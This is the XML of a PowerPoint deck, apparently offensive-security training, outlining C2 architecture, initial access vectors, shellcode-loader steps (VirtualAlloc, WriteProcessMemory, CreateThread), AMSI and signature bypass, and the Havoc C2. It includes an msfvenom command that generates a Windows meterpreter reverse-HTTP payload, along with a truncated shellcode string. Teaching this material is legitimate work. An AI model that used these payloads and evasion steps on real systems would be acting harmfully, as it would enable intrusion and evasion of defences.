        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14702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E9F-8BF6-9FD0-9063-51868E91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C2 Archtitecture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8F84-7E97-EE50-3CFD-9E3B0DC5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Team Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>(Redirectors)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Operator Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Listeners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Payload (EXE, PWSH, Shellcode …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Staged/Stageless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/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3104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761-3E29-EBE5-5C03-BDEBADC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Generate shellcode (requires loader)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4C1C-A7C6-575E-01D1-578FBC05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9106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>msfvenom -p windows/meterpreter/reverse_http LHOST=10.0.0.4 LPORT=80 -f csharp -o msf.txt</a:t>
            </a:r>
          </a:p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28F1-1A40-9C62-1479-7F6FC6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8" y="2774731"/>
            <a:ext cx="7772400" cy="32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6BA-66C8-A501-7821-306AF40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Local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256-0920-1DD5-09DA-3DFEF0DA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29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BD6-7828-52DA-270A-5A920070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Most common initial access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1086-2C4B-A676-E341-BD4EF723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VPN compromise (phished credentials)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Mail delivery (documents, links etc…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Vulnerable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94605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EAACE-45B5-B542-5532-E0ECDA9D1702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556951" y="113682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Obtain a Handle -&gt; GetCurrentProcess()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E024B-EA6B-E084-2C3B-90738C5821C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="1861757"/>
            <a:ext cx="496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AllocateMemory-&gt; VirtualAlloc()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE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PAGE_EXECUTE_READWRITE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B39E5-CDDD-5C69-8472-55C7AA704E86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556949" y="2844463"/>
            <a:ext cx="744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Write Shellcode-&gt; WriteProcessMemory()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xfc\x48\x83\xe4\xf0\xe8\...&lt;SNIP&gt;…\xc0\x00\x00\x00\x41\x51"</a:t>
            </a:r>
            <a:endParaRPr lang="en-B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F063C-AED4-1BC2-FCDE-6F5EAEB6D283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="3787404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Execute -&gt; CreateThread()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C2BAEA4-DE52-48EA-E9B1-095B2C5AB624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2273643" y="150615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C151321-46C0-5DFE-7212-C61A7B0CDBA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2273643" y="2508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F31A224-7B75-4559-F478-577B03995556}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2273644" y="3431800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8B4A6-8E01-E3BE-A03D-8AD8C2843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B73CC-4DC9-EB24-C9BE-E1F7AD11FB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556951" y="1973947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kernel32!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>VirtualAlloc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4833-3359-5E5E-8E85-BF7A1F785221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="2698883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kernelbase!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>VirtualAlloc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B7E04-F5EC-AA41-F91D-CA78A69537B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="3681589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kernelbase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>!VirtualAllocInternal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3B3E1-7B4F-405E-3F9D-AA5408339524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="4624530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u="none" strike="noStrike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webkit-standard"/>
              </a:rPr>
              <a:t>ntdll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!NtAllocateVirtualMemory -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-webkit-standard"/>
              </a:rPr>
              <a:t>Syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" b="1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3F70A02-2922-81CE-A73D-A6B26DA6D264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819108" y="2346499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6D3CE92-303E-BAB1-1739-EBD576B7269B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819106" y="3180437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14EC2F-571B-5F6B-639E-1EB40CE8EBF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819106" y="416314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7E414-A896-EE1A-5C23-DD7DB98AC9A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556949" y="556747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u="none" strike="noStrike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webkit-standard"/>
              </a:rPr>
              <a:t>ntoskrnl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!NtAllocateVirtualMemory</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE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99CCE2-3B73-3562-CF0C-AA43A4B34FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819107" y="5106084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DC6A2-E7DF-2770-A575-89B6A944014B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556948" y="124901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b="1"/>
              <a:t>PROCESS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AEB5054-6087-863F-EE26-3D97E6455D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3818234" y="1595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AB09B7-5797-FC2E-DB65-0C3062A6128B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4528224" y="5283886"/>
            <a:ext cx="3992281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208908-C223-E085-2A65-0C1AEE999A07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="940158" y="5283886"/>
            <a:ext cx="2612930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14460D-4B75-370E-A9DE-D2DB5B02F5FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7249436" y="4736752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/>
              <a:t>USERLAND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B9B0C-8881-41BE-92ED-3881EDABF9EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584004" y="54891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BE" b="1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61343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134BB-017B-1A99-8375-99863AB681E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="135235"/>
            <a:ext cx="3693042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1 : Rubeus (Signature Bypass)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- Yara</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- GoCheck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- Code + SDK (CL.exe / dotnet build)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8AD0C-A4FB-AF7D-7657-3C4DFB3E5495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="1435399"/>
            <a:ext cx="3693042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2 : Powershell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- dotnet/clr explanation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- Amsi explanation + Bypass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1B577-D982-09D6-506B-F0D718EC86E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="2444942"/>
            <a:ext cx="3693042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3 : Local Loader</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- petosc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t> shellcode generator / msfvenom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EEBA1-C8A9-BB3C-0F6A-A58B6967680D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="3745106"/>
            <a:ext cx="3693042" cy="73866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4 : Local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AES Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE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C59EE-E99D-9E5E-50D3-98385CE3F005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128437" y="2444941"/>
            <a:ext cx="3693042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/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>trings.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>Dumbin IAT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>SystemInformer (RWX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>PeBear</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>API Monitor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84EB2-862F-EB00-E7E0-50C89C20E7E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="4666993"/>
            <a:ext cx="3693042" cy="10156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5 : Remote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SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- Staging</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr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BABA1-CD34-7534-6188-BB3A735E2142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128437" y="4666993"/>
            <a:ext cx="369304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/>
              <a:t>.ico</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>lazysign</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE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E6A70-4A28-DA7A-AF33-E2FEDF9447C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437861" y="3356634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0BAC8-BFCF-1B2D-7160-EE58B42006B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437861" y="4201439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BAA9-A350-4DFD-8BE3-FD9439F09065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437861" y="5404076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84E87E-7943-E26C-2C55-D649E367D78B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027814" y="5783411"/>
            <a:ext cx="3693042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6 : HAVOC Remote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SSL c2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- Amsi Bypass</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- dotnet-execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE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A061AA-99F8-4817-B900-19D51CCE981E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437861" y="6479227"/>
            <a:ext cx="1007007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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HAVOC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t> PAYLOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182994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56422</TotalTime>
  <Words>670</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>114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-webkit-standard</vt:lpstr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C2 Archtitecture</vt:lpstr>
      <vt:lpstr>Generate shellcode (requires loader)</vt:lpstr>
      <vt:lpstr>Custom Local Shellcode Loader</vt:lpstr>
      <vt:lpstr>Most common initial access vectors</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MSDN Functions needed</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Custom Remote Shellcode Loader</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Privilege escalation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Schoonaert</dc:creator>
  <cp:lastModifiedBy>Luk Schoonaert</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-19T12:05:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-07T09:29:27Z</dcterms:modified>
</cp:coreProperties>
</file>